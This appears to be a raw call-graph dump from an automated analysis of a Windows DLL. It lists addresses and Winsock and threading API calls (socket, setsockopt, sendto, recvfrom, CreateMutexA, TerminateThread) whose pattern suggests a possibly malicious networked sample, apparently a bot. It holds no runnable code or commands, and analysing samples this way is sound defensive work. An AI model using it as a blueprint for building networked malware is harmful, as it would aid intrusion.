100025bd 31637->31639 31791 10017a55 31638->31791 31641 10002f31 ___DllMainCRTStartup 69 API calls 31639->31641 31642 100025d1 Mailbox 31641->31642 31740 1001a6a2 31642->31740 31643 10002941 Mailbox ___DllMainCRTStartup 31795 1001a1ac 31643->31795 31647 10002f31 ___DllMainCRTStartup 69 API calls 31649 100025fd Mailbox ___DllMainCRTStartup 31647->31649 31650 10003256 ___DllMainCRTStartup 69 API calls 31649->31650 31651 10002625 ___DllMainCRTStartup 31650->31651 31652 10003256 ___DllMainCRTStartup 69 API calls 31651->31652 31653 10002641 31652->31653 31654 10001d63 numpunct 69 API calls 31653->31654 31655 1000264d 31654->31655 31743 10003078 31655->31743 31659 1000267e 31660 10001d63 numpunct 69 API calls 31659->31660 31661 10002691 31660->31661 31754 10017a82 31661->31754 31663 100026a0 Mailbox 31664 10001d63 numpunct 69 API calls 31663->31664 31665 100026be 31664->31665 31666 10001d63 numpunct 69 API calls 31665->31666 31667 100026d1 31666->31667 31668 10017a82 ___DllMainCRTStartup 107 API calls 31667->31668 31669 100026e0 31668->31669 31670 10001d63 numpunct 69 API calls 31669->31670 31671 100026f2 31670->31671 31672 10001d63 numpunct 69 API calls 31671->31672 31673 10002705 31672->31673 31674 10017a82 ___DllMainCRTStartup 107 API calls 31673->31674 31675 10002714 31674->31675 31766 10017c93 31675->31766 31681 10002753 31682 10002778 ___DllMainCRTStartup 31681->31682 31683 10017bf7 ___DllMainCRTStartup 110 API calls 31681->31683 31684 10001f26 ___DllMainCRTStartup 69 API calls 31682->31684 31683->31681 31690 100027a6 Mailbox ___DllMainCRTStartup 31684->31690 31685 10002e39 69 API calls ___DllMainCRTStartup 31685->31690 31686 10001db3 69 API calls ___DllMainCRTStartup 31686->31690 31688 10001e92 69 API calls ___DllMainCRTStartup 31688->31690 31689 10002f31 ___DllMainCRTStartup 69 API calls 31689->31690 31690->31638 31690->31685 31690->31686 31690->31688 31690->31689 31790 100338d7 68 API calls _vscan_fn 31690->31790 31694 100339bc _malloc 68 API calls 31693->31694 31695 10002496 31694->31695 31695->31615 31697 1001a62c 31696->31697 31700 1001a645 31696->31700 31799 100359ab 106 API calls 6 library calls 31697->31799 31699 1001a659 31699->31618 31700->31699 31701 10001e92 ___DllMainCRTStartup 69 API calls 31700->31701 31701->31699 31703 1001a688 31702->31703 31704 1001a66f 31702->31704 31705 1001a69c 31703->31705 31707 10001e92 ___DllMainCRTStartup 69 API calls 31703->31707 31800 100359ab 106 API calls 6 library calls 31704->31800 31705->31622 31707->31705 31709 1001a118 inet_addr 31708->31709 31710 1001a0ff 31708->31710 31712 1001a130 gethostbyname 31709->31712 31713 1001a129 31709->31713 31801 100359ab 106 API calls 6 library calls 31710->31801 31715 1001a13b 31712->31715 31713->31627 31714 1001a115 31714->31709 31715->31627 31717 1001a396 31716->31717 31734 1001a3f9 Mailbox 31716->31734 31718 1001a0f8 108 API calls 31717->31718 31719 1001a3a8 31718->31719 31720 1001a3b0 htons socket 31719->31720 31719->31734 31721 1001a3f0 WSAGetLastError 31720->31721 31722 1001a40d setsockopt 31720->31722 31721->31734 31723 1001a430 inet_ntoa 31722->31723 31724 10001d63 numpunct 69 API calls 31723->31724 31735 1001a444 Mailbox ___DllMainCRTStartup 31724->31735 31726 10001e92 ___DllMainCRTStartup 69 API calls 31726->31735 31727 1001a49d connect 31727->31734 31727->31735 31728 1001a5a4 inet_addr 31728->31735 31730 1001a5bc inet_addr 31730->31735 31731 1001a5d4 inet_addr 31731->31735 31732 1001a508 inet_addr 31804 10016d1b 126 API calls 4 library calls 31732->31804 31734->31627 31735->31723 31735->31726 31735->31727 31735->31728 31735->31730 31735->31731 31735->31732 31735->31734 31736 1001a56f inet_addr 31735->31736 31802 100359ab 106 API calls 6 library calls 31735->31802 31803 10016caa 73 API calls 31735->31803 31736->31735 31738 10002d15 ___DllMainCRTStartup 69 API calls 31737->31738 31739 1001a6d1 31738->31739 31739->31632 31741 10002d15 ___DllMainCRTStartup 69 API calls 31740->31741 31742 100025e9 31741->31742 31742->31647 31744 10003082 ___DllMainCRTStartup __EH_prolog 31743->31744 31745 10003137 ___DllMainCRTStartup 69 API calls 31744->31745 31746 100030bd 31745->31746 31747 10002f31 ___DllMainCRTStartup 69 API calls 31746->31747 31748 100030c8 ___DllMainCRTStartup 31747->31748 31749 10003256 ___DllMainCRTStartup 69 API calls 31748->31749 31750 10002664 31749->31750 31751 100030ed 31750->31751 31752 10002f31 ___DllMainCRTStartup 69 API calls 31751->31752 31753 10003106 ___DllMainCRTStartup 31752->31753 31753->31659 31755 10017a8c __EH_prolog 31754->31755 31756 10017ab9 31755->31756 31805 100359ab 106 API calls 6 library calls 31755->31805 31758 10002f31 ___DllMainCRTStartup 69 API calls 31756->31758 31759 10017acb ___DllMainCRTStartup 31758->31759 31760 10003256 ___DllMainCRTStartup 69 API calls 31759->31760 31761 10017ae0 31760->31761 31762 10002f31 ___DllMainCRTStartup 69 API calls 31761->31762 31763 10017aef ___DllMainCRTStartup 31762->31763 31764 10003256 ___DllMainCRTStartup 69 API calls 31763->31764 31765 10017b04 Mailbox 31764->31765 31765->31663 31767 10017ca3 31766->31767 31768 10017cbc 31766->31768 31806 100359ab 106 API calls 6 library calls 31767->31806 31770 10002f31 ___DllMainCRTStartup 69 API calls 31768->31770 31771 10002723 31770->31771 31772 10017cd2 31771->31772 31773 10017ce2 31772->31773 31774 10017cf7 31772->31774 31807 100359ab 106 API calls 6 library calls 31773->31807 31808 10017b26 31774->31808 31777 10017d03 31779 10017d1c ___DllMainCRTStartup 31777->31779 31824 100359ab 106 API calls 6 library calls 31777->31824 31825 1001a313 31779->31825 31782 10017bf7 31783 10017c09 31782->31783 31785 10017c22 31782->31785 31879 100359ab 106 API calls 6 library calls 31783->31879 31787 10017c3d ___DllMainCRTStartup 31785->31787 31789 10017c74 Mailbox ___DllMainCRTStartup 31785->31789 31880 1001a1e1 31785->31880 31787->31789 31896 10002e39 69 API calls ___DllMainCRTStartup 31787->31896 31789->31681 31790->31690 31792 10017a5f closesocket 31791->31792 31793 10017a7a 31791->31793 31792->31793 31794 10017a6d WSAGetLastError 31792->31794 31793->31643 31794->31643 31796 1001a1c3 Mailbox 31795->31796 31797 1001a1bb 31795->31797 31798 10033984 _free 68 API calls 31797->31798 31798->31796 31799->31700 31800->31703 31801->31714 31802->31735 31803->31735 31804->31735 31805->31756 31806->31768 31807->31774 31809 10017b30 __EH_prolog 31808->31809 31832 10018235 31809->31832 31816 10001d63 numpunct 69 API calls 31817 10017b81 31816->31817 31818 10017a82 ___DllMainCRTStartup 107 API calls 31817->31818 31819 10017b8c ___DllMainCRTStartup 31818->31819 31820 10003256 ___DllMainCRTStartup 69 API calls 31819->31820 31821 10017ba1 31820->31821 31822 1001a313 ___DllMainCRTStartup 108 API calls 31821->31822 31823 10017baa std::ios_base::_Ios_base_dtor ___DllMainCRTStartup 31822->31823 31823->31777 31824->31779 31826 1001a323 31825->31826 31827 1001a339 send 31825->31827 31878 100359ab 106 API calls 6 library calls 31826->31878 31830 1000272e 31827->31830 31831 1001a35b WSAGetLastError 31827->31831 31830->31782 31831->31830 31833 1001823f __EH_prolog 31832->31833 31853 10018a47 31833->31853 31836 10033888 std::_Facet_Register 69 API calls 31837 100182bb 31836->31837 31838 10017b48 31837->31838 31863 1003274c 76 API calls 6 library calls 31837->31863 31840 10017d97 31838->31840 31841 10017da1 __EH_prolog 31840->31841 31864 10018bd8 31841->31864 31843 10017e76 31870 10018c40 31843->31870 31846 10017dba ___DllMainCRTStartup 31846->31843 31868 10019d89 122 API calls 9 library calls 31846->31868 31848 10017de0 std::ios_base::_Ios_base_dtor 31848->31843 31869 10017f3b 69 API calls ___DllMainCRTStartup 31848->31869 31850 1001837c 31874 10018b46 31850->31874 31852 10017b6e 31852->31816 31854 10018a51 __EH_prolog 31853->31854 31855 10033888 std::_Facet_Register 69 API calls 31854->31855 31856 10018a88 31855->31856 31857 1003274c std::locale::_Init 76 API calls 31856->31857 31858 10018a96 ___DllMainCRTStartup 31856->31858 31857->31858 31859 10019ce5 ___DllMainCRTStartup 122 API calls 31858->31859 31860 10018abd std::ios_base::_Ios_base_dtor 31859->31860 31861 1001828f 31860->31861 31862 1001791f ___DllMainCRTStartup 69 API calls 31860->31862 31861->31836 31862->31861 31863->31838 31865 10018be2 __EH_prolog 31864->31865 31866 10018c1e 31865->31866 31867 10017e91 ___DllMainCRTStartup 69 API calls 31865->31867 31866->31846 31867->31866 31868->31848 31869->31843 31871 10018c48 31870->31871 31872 10017b5a 31871->31872 31873 100193fd ___DllMainCRTStartup 69 API calls 31871->31873 31872->31850 31873->31872 31875 10018b5c 31874->31875 31876 10001f26 ___DllMainCRTStartup 69 API calls 31875->31876 31877 10018b88 Mailbox ___DllMainCRTStartup 31875->31877 31876->31877 31877->31852 31878->31827 31879->31785 31881 1001a1eb __EH_prolog 31880->31881 31882 1001a1fe recv 31881->31882 31890 1001a23e 31881->31890 31883 1001a243 31882->31883 31884 1001a21f WSAGetLastError 31882->31884 31885 10001d63 numpunct 69 API calls 31883->31885 31886 1001a233 ___DllMainCRTStartup 31884->31886 31887 1001a24e 31885->31887 31889 10001f26 ___DllMainCRTStartup 69 API calls 31886->31889 31888 10001e92 ___DllMainCRTStartup 69 API calls 31887->31888 31895 1001a270 Mailbox ___DllMainCRTStartup 31888->31895 31889->31890 31890->31787 31891 1001a2e4 recv 31891->31890 31891->31895 31892 10001d63 numpunct 69 API calls 31892->31895 31893 10001e92 ___DllMainCRTStartup 69 API calls 31893->31895 31894 10002f31 ___DllMainCRTStartup 69 API calls 31894->31895 31895->31891 31895->31892 31895->31893 31895->31894 31896->31789 31899 1001e1c2 31898->31899 31900 1001e1ba closesocket 31898->31900 31901 1001e1c6 closesocket 31899->31901 31902 1001e1cc 31899->31902 31900->31899 31901->31902 31903 1001e1d1 closesocket 31902->31903 31904 1001e1d9 31902->31904 31903->31904 31905 1001e205 31904->31905 31906 1001e1ec Sleep TerminateThread CloseHandle 31904->31906 31907 1001e223 31905->31907 31908 1001e20a Sleep TerminateThread CloseHandle 31905->31908 31906->31905 31909 1001e241 31907->31909 31910 1001e228 Sleep TerminateThread CloseHandle 31907->31910 31908->31907 31911 1001e246 Sleep TerminateThread CloseHandle 31909->31911 31912 1001e25f Sleep 31909->31912 31910->31909 31911->31912 31912->30737 31913->30738 31915 1000e824 31914->31915 31916 1000e815 ReleaseMutex CloseHandle 31914->31916 31927 1000e7a5 31915->31927 31916->31915 31919 1000e847 TerminateThread CloseHandle 31920 1000e85b 31919->31920 31921 1000e865 TerminateThread CloseHandle 31920->31921 31922 1000e879 31920->31922 31921->31922 31923 1000e883 TerminateThread CloseHandle 31922->31923 31924 1000e897 31922->31924 31923->31924 31925 100074e8 31924->31925 31931 10015d17 68 API calls Mailbox 31924->31931 31925->30741 31925->30742 31929 1000e7b6 31927->31929 31928 1000e7ee Sleep 31928->31919 31928->31920 31929->31928 31932 1000bffa 112 API calls 3 library calls 31929->31932 31931->31924 31932->31928 31942 10005be6 WSAStartup 31933->31942 31935 1001a92a 31936 1001a93d 31935->31936 31937 1001a92c Sleep 31935->31937 31938 10007486 ___DllMainCRTStartup 143 API calls 31936->31938 31937->31935 31939 1001a944 31938->31939 31940 1001a984 Sleep 31939->31940 31941 1001a94d ReleaseMutex CloseHandle ReleaseMutex CloseHandle 31939->31941 31941->31940 31943 10005c24 Mailbox 31942->31943 31944 10005c2b ___lc_wcstolc 31942->31944 31943->31935 31996 1001544f 31944->31996 31947 10011419 ___DllMainCRTStartup 72 API calls 31948 10005c6d 31947->31948 32009 10009ec5 31948->32009 31950 10005c84 Mailbox 31951 10005c97 CreateMutexA 31950->31951 31952 1001c213 ___DllMainCRTStartup 70 API calls 31951->31952 31953 10005cdb 31952->31953 31954 10032fed _sprintf 104 API calls 31953->31954 31955 10005d19 31954->31955 31956 10003078 ___DllMainCRTStartup 69 API calls 31955->31956 31957 10005d2b 31956->31957 31958 10002f31 ___DllMainCRTStartup 69 API calls 31957->31958 31959 10005d43 Mailbox 31958->31959 31960 10001898 ___DllMainCRTStartup 104 API calls 31959->31960 31961 10005d61 31960->31961 31962 10001d63 numpunct 69 API calls 31961->31962 31963 10005d6e CreateMutexA 31962->31963 31964 10005dab ___lc_wcstolc 31963->31964 31965 1001c213 ___DllMainCRTStartup 70 API calls 31964->31965 31966 10005db7 31965->31966 31967 10032fed _sprintf 104 API calls 31966->31967 31968 10005de5 31967->31968 31969 10003078 ___DllMainCRTStartup 69 API calls 31968->31969 31970 10005df7 31969->31970 31971 10002f31 ___DllMainCRTStartup 69 API calls 31970->31971 31972 10005e0f Mailbox 31971->31972 31973 10001898 ___DllMainCRTStartup 104 API calls 31972->31973 31974 10005e2d 31973->31974 31975 10001d63 numpunct 69 API calls 31974->31975 31976 10005e3a CreateMutexA 31975->31976 31977 10005e76 ___lc_wcstolc 31976->31977 31978 1001c213 ___DllMainCRTStartup 70 API calls 31977->31978 31979 10005e85 31978->31979 31980 10032fed _sprintf 104 API calls 31979->31980 31981 10005eb3 31980->31981 31982 10003078 ___DllMainCRTStartup 69 API calls 31981->31982 31983 10005ec5 31982->31983 31984 10002f31 ___DllMainCRTStartup 69 API calls 31983->31984 31985 10005ee0 Mailbox 31984->31985 31986 10001898 ___DllMainCRTStartup 104 API calls 31985->31986 31987 10005efe 31986->31987 31988 10001d63 numpunct 69 API calls 31987->31988 31989 10005f0b CreateMutexA CreateThread CreateThread 31988->31989 31990 10005fad ___lc_wcstolc 31989->31990 32495 100056f0 31989->32495 32504 10005697 31989->32504 31990->31990 31991 10011419 ___DllMainCRTStartup 72 API calls 31990->31991 31992 100060ab Mailbox ___DllMainCRTStartup 31991->31992 32016 100075ef 31992->32016 31994 100060ca 32021 1001e093 31994->32021 31997 10015459 __EH_prolog 31996->31997 31998 10001d63 numpunct 69 API calls 31997->31998 31999 10015471 31998->31999 32000 10034410 __time64 GetSystemTimeAsFileTime 31999->32000 32001 10015480 32000->32001 32029 100342d6 32001->32029 32005 100342b3 68 API calls _rand 32006 1001548d 32005->32006 32006->32005 32008 10005c54 32006->32008 32035 10002fd7 69 API calls ___DllMainCRTStartup 32006->32035 32008->31947 32010 10009ef4 32009->32010 32011 10009ede 32009->32011 32012 10002f31 ___DllMainCRTStartup 69 API calls 32010->32012 32011->32010 32013 10009ee9 32011->32013 32014 10009ef2 ___DllMainCRTStartup 32012->32014 32036 1000316e 69 API calls 2 library calls 32013->32036 32014->31950 32037 1000e186 32016->32037 32018 10007604 32019 10007623 TerminateThread CloseHandle 32018->32019 32020 10007636 CreateThread 32018->32020 32019->32020 32020->31994 32065 1001d6d7 32020->32065 32022 1001e0a1 32021->32022 32023 1001e09c 32021->32023 32083 1001df6a 32022->32083 32024 1001e1a7 ___DllMainCRTStartup 16 API calls 32023->32024 32024->32022 32027 1001e0b6 CreateThread 32028 1001e0cc 32027->32028 32088 1001c9a2 32027->32088 32028->31943 32030 100416ee ____lc_codepage_func 68 API calls 32029->32030 32031 10015486 32030->32031 32032 100342b3 32031->32032 32033 100416ee ____lc_codepage_func 68 API calls 32032->32033 32034 100342b8 32033->32034 32034->32006 32035->32006 32036->32014 32038 1000e190 __EH_prolog 32037->32038 32039 10034410 __time64 GetSystemTimeAsFileTime 32038->32039 32040 1000e1b6 32039->32040 32041 100342d6 68 API calls 32040->32041 32042 1000e1bd 32041->32042 32043 100342b3 _rand 68 API calls 32042->32043 32044 1000e1c3 32043->32044 32045 10034410 __time64 GetSystemTimeAsFileTime 32044->32045 32046 1000e1cc ___lc_wcstolc 32045->32046 32047 10011419 ___DllMainCRTStartup 72 API calls 32046->32047 32048 1000e1fc 32047->32048 32049 10032fed _sprintf 104 API calls 32048->32049 32051 1000e22d Mailbox 32049->32051 32050 10001d63 69 API calls numpunct 32050->32051 32051->32050 32052 1000246e ___DllMainCRTStartup 200 API calls 32051->32052 32053 1000c15a ___DllMainCRTStartup 99 API calls 32051->32053 32054 10001e92 ___DllMainCRTStartup 69 API calls 32051->32054 32056 1001ba63 69 API calls ___DllMainCRTStartup 32051->32056 32059 10002d15 69 API calls ___DllMainCRTStartup 32051->32059 32061 1000e40a Mailbox ___DllMainCRTStartup 32051->32061 32062 1001c022 69 API calls 3 library calls 32051->32062 32063 1001445f 105 API calls 4 library calls 32051->32063 32064 10012d83 85 API calls 6 library calls 32051->32064 32052->32051 32055 1000e3f7 Sleep 32053->32055 32054->32051 32055->32051 32056->32051 32059->32051 32061->32018 32062->32051 32063->32051 32064->32051 32066 1001d706 socket 32065->32066 32077 1001d8f1 Mailbox 32065->32077 32067 1001d726 7 API calls 32066->32067 32068 1001d71b WSAGetLastError 32066->32068 32067->32068 32069 1001d7c5 ___lc_wcstolc 32067->32069 32068->32077 32070 10002d15 ___DllMainCRTStartup 69 API calls 32069->32070 32071 1001d7ef ___DllMainCRTStartup 32070->32071 32072 10003256 ___DllMainCRTStartup 69 API calls 32071->32072 32073 1001d80d 32072->32073 32074 10002d15 ___DllMainCRTStartup 69 API calls 32073->32074 32075 1001d817 ___DllMainCRTStartup 32074->32075 32076 10003256 ___DllMainCRTStartup 69 API calls 32075->32076 32081 1001d836 ___lc_wcstolc 32076->32081 32078 1001d853 recvfrom 32079 1001d875 WSAGetLastError 32078->32079 32080 1001d87d inet_ntoa 32078->32080 32079->32081 32080->32081 32081->32077 32081->32078 32082 1001d8c2 sendto 32081->32082 32082->32081 32084 1001dfc6 32083->32084 32085 1001df76 socket 32083->32085 32084->32027 32084->32028 32086 1001df91 setsockopt setsockopt 32085->32086 32087 1001df89 WSAGetLastError 32085->32087 32086->32084 32087->32084 32089 1001c9d1 htons inet_addr setsockopt 32088->32089 32099 1001d10d Mailbox 32088->32099 32090 1001ca37 ___lc_wcstolc 32089->32090 32091 10002d15 ___DllMainCRTStartup 69 API calls 32090->32091 32092 1001ca4e ___DllMainCRTStartup 32091->32092 32093 10003256 ___DllMainCRTStartup 69 API calls 32092->32093 32094 1001ca6f 32093->32094 32095 100022f0 ___DllMainCRTStartup 72 API calls 32094->32095 32117 1001caad Mailbox _strstr ___lc_wcstolc ___DllMainCRTStartup _memcmp 32095->32117 32096 1001cab5 Sleep 32096->32117 32097 1001d102 closesocket 32097->32099 32100 1001cb0c sendto 32100->32117 32101 1001ce7f recvfrom 32102 1001ceac WSAGetLastError 32101->32102 32101->32117 32102->32117 32103 1001cb4a inet_ntoa 32105 10001d63 numpunct 69 API calls 32103->32105 32105->32117 32106 1001d0d7 32115 1001d02c Mailbox 32106->32115 32132 10006146 32106->32132 32107 10002e39 69 API calls ___DllMainCRTStartup 32107->32117 32109 10003256 69 API calls ___DllMainCRTStartup 32109->32117 32110 1001d031 32111 10006146 472 API calls 32110->32111 32110->32115 32111->32115 32112 10002d15 69 API calls ___DllMainCRTStartup 32112->32117 32113 10001e92 ___DllMainCRTStartup 69 API calls 32113->32117 32114 1000c213 ___DllMainCRTStartup 81 API calls 32114->32117 32115->32097 32115->32099 32117->32096 32117->32100 32117->32101 32117->32103 32117->32106 32117->32107 32117->32109 32117->32110 32117->32112 32117->32113 32117->32114 32117->32115 32118 1001d06f 32117->32118 32123 1001e307 32117->32123 32126 1001df0d gethostname 32117->32126 32171 10010dd2 79 API calls 2 library calls 32117->32171 32119 10001e92 ___DllMainCRTStartup 69 API calls 32118->32119 32120 1001d084 32119->32120 32172 10006376 481 API calls 4 library calls 32120->32172 32173 1003496a 32123->32173 32127 1001df31 gethostbyname 32126->32127 32128 1001df2d 32126->32128 32127->32128 32129 1001df42 inet_ntoa 32127->32129 32128->32117 32130 1001df58 ___DllMainCRTStartup 32129->32130 32131 10001f26 ___DllMainCRTStartup 69 API calls 32130->32131 32131->32128 32133 10006150 __EH_prolog 32132->32133 32134 10006162 32133->32134 32135 10006257 32133->32135 32198 1001e124 32134->32198 32137 100062ca 32135->32137 32139 1001e0d0 478 API calls 32135->32139 32163 1000624a Mailbox 32135->32163 32141 100062e1 CreateThread 32137->32141 32142 100062f9 32137->32142 32138 10006185 32140 1001df0d 72 API calls 32138->32140 32144 10006274 32139->32144 32143 100061b5 32140->32143 32141->32142 32494 1001d91a 80 API calls 4 library calls 32141->32494 32153 10006330 32142->32153 32154 1000631f 32142->32154 32147 10034410 __time64 GetSystemTimeAsFileTime 32143->32147 32145 10006299 32144->32145 32146 1000627e 32144->32146 32261 100087e9 216 API calls 10 library calls 32145->32261 32148 10006297 32146->32148 32151 10001e92 ___DllMainCRTStartup 69 API calls 32146->32151 32149 100061bd 32147->32149 32155 1000e4e1 399 API calls 32148->32155 32202 10008c40 32149->32202 32151->32148 32263 1000bd40 113 API calls 3 library calls 32153->32263 32262 1000bcd6 112 API calls 3 library calls 32154->32262 32155->32137 32158 100062a4 Mailbox ___DllMainCRTStartup 32158->32148 32159 100061cf 32160 100061f3 32159->32160 32162 100061d8 Sleep 32159->32162 32159->32163 32213 1001e0d0 32159->32213 32164 10034410 __time64 GetSystemTimeAsFileTime 32160->32164 32162->32159 32163->32115 32168 100061f9 32164->32168 32165 10034410 __time64 GetSystemTimeAsFileTime 32165->32168 32166 1000623a 32220 1000e4e1 32166->32220 32168->32165 32168->32166 32169 1000c15a ___DllMainCRTStartup 99 API calls 32168->32169 32170 1000621d Sleep 32169->32170 32170->32168 32171->32117 32172->32115 32176 100348f5 32173->32176 32175 1001e31e 32175->32117 32177 100348fe 32176->32177 32180 10034913 32176->32180 32192 10037f1f 68 API calls __getptd_noexit 32177->32192 32179 10034954 32196 10037f1f 68 API calls __getptd_noexit 32179->32196 32180->32179 32183 10034921 32180->32183 32182 10034903 32193 1003b745 9 API calls __filbuf 32182->32193 32194 10034714 99 API calls 2 library calls 32183->32194 32184 1003494c 32197 1003b745 9 API calls __filbuf 32184->32197 32187 10034938 32190 10034964 32187->32190 32195 10037f1f 68 API calls __getptd_noexit 32187->32195 32188 1003490e 32188->32175 32190->32175 32192->32182 32193->32188 32194->32187 32195->32184 32196->32184 32197->32190 32199 1001e12e 32198->32199 32200 1001e139 TerminateThread CloseHandle 32199->32200 32201 1001e14c CreateThread 32199->32201 32200->32201 32201->32138 32264 1001d388 32201->32264 32203 10008c4a __EH_prolog 32202->32203 32204 10008c99 32203->32204 32205 10008c5d 32203->32205 32206 10008ca6 32204->32206 32291 1000930e 69 API calls ___DllMainCRTStartup 32204->32291 32208 10008c77 32205->32208 32289 1000930e 69 API calls ___DllMainCRTStartup 32205->32289 32207 10008c93 32206->32207 32292 1000a778 69 API calls ___DllMainCRTStartup 32206->32292 32207->32159 32208->32207 32290 1000a778 69 API calls ___DllMainCRTStartup 32208->32290 32214 1001e0da 32213->32214 32293 1001dfcb 32214->32293 32217 1001e11b 32217->32159 32218 1001e0f1 TerminateThread CloseHandle 32219 1001e104 CreateThread 32218->32219 32219->32217 32300 1001d145 32219->32300 32221 1000e7f8 ___DllMainCRTStartup 121 API calls 32220->32221 32222 1000e50a 32221->32222 32223 1000da3f ___DllMainCRTStartup 108 API calls 32222->32223 32224 1000e511 32223->32224 32225 10001d63 numpunct 69 API calls 32224->32225 32254 1000e731 Mailbox 32224->32254 32226 1000e529 32225->32226 32229 1000e543 32226->32229 32232 1000e4a3 ___DllMainCRTStartup 174 API calls 32226->32232 32227 1000e773 32230 1000e791 32227->32230 32231 1000e77b CreateThread 32227->32231 32228 1000e75d CreateThread 32228->32227 32324 1000d556 32228->32324 32233 1000e649 32229->32233 32238 1000e55d ___DllMainCRTStartup 32229->32238 32230->32163 32231->32230 32319 1000d52d 32231->32319 32232->32229 32315 1000db5e 149 API calls 4 library calls 32233->32315 32235 1000e654 32316 10015be6 69 API calls 2 library calls 32235->32316 32237 1000e5e1 32239 10002f31 ___DllMainCRTStartup 69 API calls 32237->32239 32240 1000e594 ___DllMainCRTStartup 32238->32240 32241 10001f26 ___DllMainCRTStartup 69 API calls 32238->32241 32242 1000e5f3 32239->32242 32240->32237 32243 10001f26 ___DllMainCRTStartup 69 API calls 32240->32243 32241->32240 32244 10002d15 ___DllMainCRTStartup 69 API calls 32242->32244 32245 1000e5b8 ___DllMainCRTStartup 32243->32245 32246 1000e602 32244->32246 32252 10001f26 ___DllMainCRTStartup 69 API calls 32245->32252 32248 100117aa ___DllMainCRTStartup 257 API calls 32246->32248 32247 1000e687 Sleep 32317 1000db5e 149 API calls 4 library calls 32247->32317 32251 1000e60d ___DllMainCRTStartup 32248->32251 32249 1000e71b CreateThread 32249->32254 32331 1000d124 254 API calls 7 library calls 32249->32331 32255 1000e626 Sleep 32251->32255 32256 1000e5d7 32252->32256 32253 1000e6c2 Mailbox 32253->32249 32254->32227 32254->32228 32258 1000e644 Mailbox 32255->32258 32259 1000c15a ___DllMainCRTStartup 99 API calls 32256->32259 32258->32254 32259->32237 32260 1000e665 Mailbox 32260->32247 32260->32253 32318 10015be6 69 API calls 2 library calls 32260->32318 32261->32158 32262->32163 32263->32163 32265 1001d3b7 32264->32265 32273 1001d6ae Mailbox 32264->32273 32266 10002d15 ___DllMainCRTStartup 69 API calls 32265->32266 32267 1001d3c4 ___DllMainCRTStartup 32266->32267 32268 10003256 ___DllMainCRTStartup 69 API calls 32267->32268 32269 1001d3e3 32268->32269 32270 10002d15 ___DllMainCRTStartup 69 API calls 32269->32270 32271 1001d3ed ___DllMainCRTStartup 32270->32271 32272 10003256 ___DllMainCRTStartup 69 API calls 32271->32272 32274 1001d40e 32272->32274 32274->32273 32275 1001d422 socket 32274->32275 32276 1001d44a htons setsockopt setsockopt setsockopt sendto 32275->32276 32277 1001d43a WSAGetLastError 32275->32277 32276->32277 32287 1001d4eb ___lc_wcstolc 32276->32287 32278 1001d69e Sleep 32277->32278 32278->32273 32278->32274 32279 1001d676 closesocket 32279->32278 32280 1001d528 recvfrom 32281 1001d670 WSAGetLastError 32280->32281 32282 1001d554 inet_ntoa 32280->32282 32281->32279 32282->32287 32283 1001d658 Sleep 32286 1001d61a Mailbox 32283->32286 32283->32287 32284 10001d63 numpunct 69 API calls 32284->32286 32286->32279 32286->32283 32286->32284 32288 10008baf 69 API calls ___DllMainCRTStartup 32286->32288 32287->32279 32287->32280 32287->32283 32287->32286 32288->32286 32289->32208 32290->32207 32291->32206 32292->32207 32294 1001dfe1 socket 32293->32294 32299 1001dfda 32293->32299 32295 1001e002 htons htonl setsockopt bind 32294->32295 32296 1001dff7 WSAGetLastError 32294->32296 32297 1001e053 WSAGetLastError 32295->32297 32298 1001e05b setsockopt setsockopt 32295->32298 32296->32299 32297->32299 32298->32299 32299->32217 32299->32218 32299->32219 32301 1001d371 32300->32301 32307 1001d174 Mailbox ___lc_wcstolc ___DllMainCRTStartup _memcmp 32300->32307 32302 1001d35e 32302->32301 32303 1001d364 closesocket 32302->32303 32303->32301 32304 1001d1ab recvfrom 32305 1001d1d4 WSAGetLastError 32304->32305 32304->32307 32305->32307 32306 10002d15 ___DllMainCRTStartup 69 API calls 32306->32307 32307->32302 32307->32304 32307->32306 32308 10003256 ___DllMainCRTStartup 69 API calls 32307->32308 32309 1001e307 99 API calls 32307->32309 32310 1001d2c8 sendto inet_ntoa 32307->32310 32312 1001d30d 32307->32312 32308->32307 32309->32307 32311 10001d63 numpunct 69 API calls 32310->32311 32311->32307 32314 10006376 481 API calls 4 library calls 32312->32314 32314->32307 32315->32235 32316->32260 32317->32260 32318->32260 32320 1000d53a 32319->32320 32321 1000d54f 32320->32321 32332 1000e8e3 32320->32332 32323 1000d541 Sleep 32323->32320 32326 1000d563 32324->32326 32325 1000d59c 32326->32325 32327 1000d56d WaitForSingleObject 32326->32327 32329 1000d587 ReleaseMutex 32326->32329 32330 1000d58e Sleep 32326->32330 32359 100145d5 32326->32359 32327->32326 32329->32330 32330->32326 32333 1000e8ed __EH_prolog 32332->32333 32334 10034410 __time64 GetSystemTimeAsFileTime 32333->32334 32336 1000e8ff 32334->32336 32335 1000e955 32337 1000ec02 32335->32337 32338 1000ec83 Mailbox 32335->32338 32342 1000eac5 32335->32342 32336->32335 32345 10007539 128 API calls 32336->32345 32339 10012592 75 API calls 32337->32339 32338->32323 32340 1000ec16 32339->32340 32341 10002d15 ___DllMainCRTStartup 69 API calls 32340->32341 32343 1000ec31 32341->32343 32342->32338 32344 10012342 72 API calls 32342->32344 32346 10002d15 ___DllMainCRTStartup 69 API calls 32343->32346 32347 1000eb14 32344->32347 32345->32335 32348 1000ec49 32346->32348 32349 10001d63 numpunct 69 API calls 32347->32349 32350 10009643 ___DllMainCRTStartup 69 API calls 32348->32350 32351 1000eb2d 32349->32351 32352 1000eb61 32350->32352 32353 10002d15 ___DllMainCRTStartup 69 API calls 32351->32353 32355 10011030 125 API calls 32352->32355 32354 1000eb45 32353->32354 32356 10009643 ___DllMainCRTStartup 69 API calls 32354->32356 32357 1000ec78 32355->32357 32356->32352 32357->32338 32358 10034410 __time64 GetSystemTimeAsFileTime 32357->32358 32358->32338 32361 100145df __EH_prolog 32359->32361 32360 1001516f 32360->32326 32361->32360 32362 100092ab 68 API calls 32361->32362 32370 10014666 _memmove 32362->32370 32363 1001476e htonl 32371 100147b1 _memmove 32363->32371 32430 100150dd Mailbox 32363->32430 32364 1001470a htonl 32364->32370 32364->32430 32365 10008c24 Mailbox 68 API calls 32365->32360 32366 10034410 __time64 GetSystemTimeAsFileTime 32468 10014769 Mailbox 32366->32468 32367 1000a435 68 API calls 32367->32370 32368 1001485c htonl htonl htonl htonl 32373 100148a0 _memmove 32368->32373 32368->32430 32369 10015d17 ___DllMainCRTStartup 68 API calls 32369->32370 32370->32363 32370->32364 32370->32367 32370->32369 32372 10008c24 Mailbox 68 API calls 32370->32372 32370->32430 32370->32468 32371->32368 32371->32430 32371->32468 32372->32370 32375 10014ad9 32373->32375 32376 1001490c 32373->32376 